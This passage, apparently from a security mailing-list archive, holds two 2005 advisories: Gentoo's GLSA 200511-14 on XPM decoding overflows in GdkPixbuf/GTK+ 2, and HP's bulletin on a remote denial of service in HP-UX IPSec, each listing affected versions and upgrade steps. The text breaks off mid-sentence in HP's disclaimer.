- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities Date: November 16, 2005 Bugs: #112608 ID: 200511-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The GdkPixbuf library, that is also included in GTK+ 2, contains vulnerabilities that could lead to a Denial of Service or the execution of arbitrary code. Background == GTK+ (the GIMP Toolkit) is a toolkit for creating graphical user interfaces. The GdkPixbuf library provides facilities for image handling. It is available as a standalone library and also packaged with GTK+ 2. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 x11-libs/gtk+ 2.8.6-r1 = 2.8.6-r1 *= 2.6.10-r1 2.0 2 media-libs/gdk-pixbuf 0.22.0-r5 = 0.22.0-r5 --- 2 affected packages on all of their supported architectures. --- Description === iDEFENSE reported a possible heap overflow in the XPM loader (CVE-2005-3186). Upon further inspection, Ludwig Nussel discovered two additional issues in the XPM processing functions : an integer overflow (CVE-2005-2976) that affects only gdk-pixbuf, and an infinite loop (CVE-2005-2975). Impact == Using a specially crafted XPM image an attacker could cause an affected application to enter an infinite loop or trigger the overflows, potentially allowing the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All GTK+ 2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose x11-libs/gtk+ All GdkPixbuf users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-libs/gdk-pixbuf-0.22.0-r5 References == [ 1 ] CVE-2005-2975 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2975 [ 2 ] CVE-2005-2976 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2976 [ 3 ] CVE-2005-3186 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3186 [ 4 ] iDefense Security Advisory 11.15.05 http://www.idefense.com/application/poi/display?id=339type=vulnerabilities Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature
[security bulletin] SSRT5979 - HP-UX Running IPSec Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00555601 Version: 1 HPSBUX02076 SSRT5979 - HP-UX Running IPSec Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2005-11-11 Last Updated: 2005-11-15 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP-UX running IPSec. These vulnerabilities may be exploited remotely by an unauthorized user to create a Denial of Service (DoS). References: NISCC Vulnerability Advisory 273756 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.11, and B.11.23 running IPSec. BACKGROUND To determine if an HP-UX system has an affected version, search the output of swlist -a revision -l fileset for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.00 = IPSec.IPSEC2-KRN action: install revision A.01.05.01 or subsequent HP-UX B.11.11 = IPSec.IPSEC2-KRN action: install revision A.01.07.02 or subsequent HP-UX B.11.11 = IPSec.IPSEC2-KRN,revision=A.02.00 action: install revision A.02.01 or subsequent HP-UX B.11.23 = IPSec.IPSEC2-KRN action: install revision A.02.01 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made the following software updates available to resolve the issue. The updates are available from http://www.hp.com/go/softwaredepot HP-UX B.11.00 HP-UX IPSec A.01.05.01 or subsequent HP-UX B.11.11 HP-UX IPSec A.01.07.02 HP-UX B.11.11 HP-UX IPSec A.02.01 or subsequent HP-UX B.11.23 HP-UX IPSec A.02.01 or subsequent MANUAL ACTIONS: Yes - Update HP-UX B.11.00 HP-UX IPSec A.01.05.01 or subsequent HP-UX B.11.11 HP-UX IPSec A.01.07.02 HP-UX B.11.11 HP-UX IPSec A.02.01 or subsequent HP-UX B.11.23 HP-UX IPSec A.02.01 or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi displayProductInfo.pl?productnumber=B6834AAtN UPDATE HISTORY Initial release: 15 November 2005 Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for